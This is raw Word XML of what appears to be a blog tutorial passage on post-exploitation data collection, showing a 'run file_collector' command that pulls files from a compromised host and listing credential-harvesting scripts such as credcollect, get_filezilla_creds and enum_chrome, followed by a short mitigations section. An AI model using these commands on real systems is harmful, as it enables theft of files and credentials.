          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">/file.txt | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -v \DDD | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -v \GCC | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -v \GDB | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -v \MAKE &gt; file.lst2</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t>(I am removing the \DDD \GCC \GDB \MAKE directories, which is not particularly relevant to you, just an example. I am chopping two carrots with one knife here, as this was useful to me at the time ;o)</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b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Downloading the file list</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t>Once we have the edited file list we can simply start the file download process with the following command:</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t xml:space="preserve">run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>file_collector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -i /root/Courses/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>CforLinux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>file.lst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l /root/Courses/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>CforLinux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t> </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p>
    <w:p w:rsidR="00F07469" w:rsidRPr="00F07469" w:rsidRDefault="00F07469" w:rsidP="00F07469">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03D019B2" wp14:editId="617681A7">
            <wp:extent cx="3810000" cy="1238250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="Picture 8" descr="http://3.bp.blogspot.com/_2IvFH57W8Hc/TMiD2BNgPwI/AAAAAAAAADg/e7ZDcRkfXac/s400/downloading.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3.bp.blogspot.com/_2IvFH57W8Hc/TMiD2BNgPwI/AAAAAAAAADg/e7ZDcRkfXac/s400/downloading.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1238250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07469" w:rsidRPr="00F07469" w:rsidRDefault="00F07469" w:rsidP="00F07469">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>There we go, and that was a very quick way to download all the files I needed.</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b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Other scripts for data collection</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t>There are a whole host of data collection scripts that you can try, including the following:</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t xml:space="preserve">scraper, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>credcollect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>get_filezilla_creds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>dumplinks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>get_pidgin_creds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>enum_chrome</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>enum_firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>enum_putty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>winenum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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t>...and if you are feeling adventurous you could create your own scripts. (Maybe a blog for another time)</w:t>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sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mitigations</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07469" w:rsidRPr="00F07469" w:rsidRDefault="00F07469" w:rsidP="00F07469">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">There aren't really any </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>mitigations</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> for these examples. If the exploitation has got this far, it is basically game-over.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07469" w:rsidRPr="00F07469" w:rsidRDefault="00F07469" w:rsidP="00F07469">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Deploying a layered security program, using "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> in depth" can reduce the risk of the initial exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07469" w:rsidRPr="00F07469" w:rsidRDefault="00F07469" w:rsidP="00066ED9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F07469" w:rsidRPr="00F074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106" w:rsidRDefault="000D3106" w:rsidP="00ED43A8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000D3106" w:rsidRDefault="000D3106" w:rsidP="00ED4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106" w:rsidRDefault="000D3106" w:rsidP="00ED43A8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000D3106" w:rsidRDefault="000D3106" w:rsidP="00ED43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FB580C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0CBC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D92D30"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="85D8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456486"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="529C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D6597C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E28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AF09FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2FB0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1AB"/>
    <w:rsid w:val="00066ED9"/>
    <w:rsid w:val="000D3106"/>
    <w:rsid w:val="00221355"/>
    <w:rsid w:val="00254458"/>
    <w:rsid w:val="00376C73"/>
    <w:rsid w:val="006B5BC7"/>
    <w:rsid w:val="00C959DC"/>
    <w:rsid w:val="00D551AB"/>
    <w:rsid w:val="00ED43A8"/>
    <w:rsid w:val="00F07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544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5445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3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A8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED43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A8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0025445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544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ta-role">
    <w:name w:val="meta-role"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002544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ta-date">
    <w:name w:val="meta-date"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002544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54458"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0025445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54458"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0025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4458"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="com">
    <w:name w:val="com"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00254458"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pln">
    <w:name w:val="pln"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00254458"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="str">
    <w:name w:val="str"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00254458"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kwd">
    <w:name w:val="kwd"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00254458"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pun">
    <w:name w:val="pun"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00254458"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="typ">
    <w:name w:val="typ"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00254458"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="lit">
    <w:name w:val="lit"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00254458"/>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00254458"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00254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4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544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5445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43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A8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED43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A8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00254458"/>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544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ta-role">
    <w:name w:val="meta-role"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0025445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eta-date">
    <w:name w:val="meta-date"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002544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54458"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0025445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254458"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00254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4458"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="com">
    <w:name w:val="com"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00254458"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pln">
    <w:name w:val="pln"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00254458"/>
  </w:style>
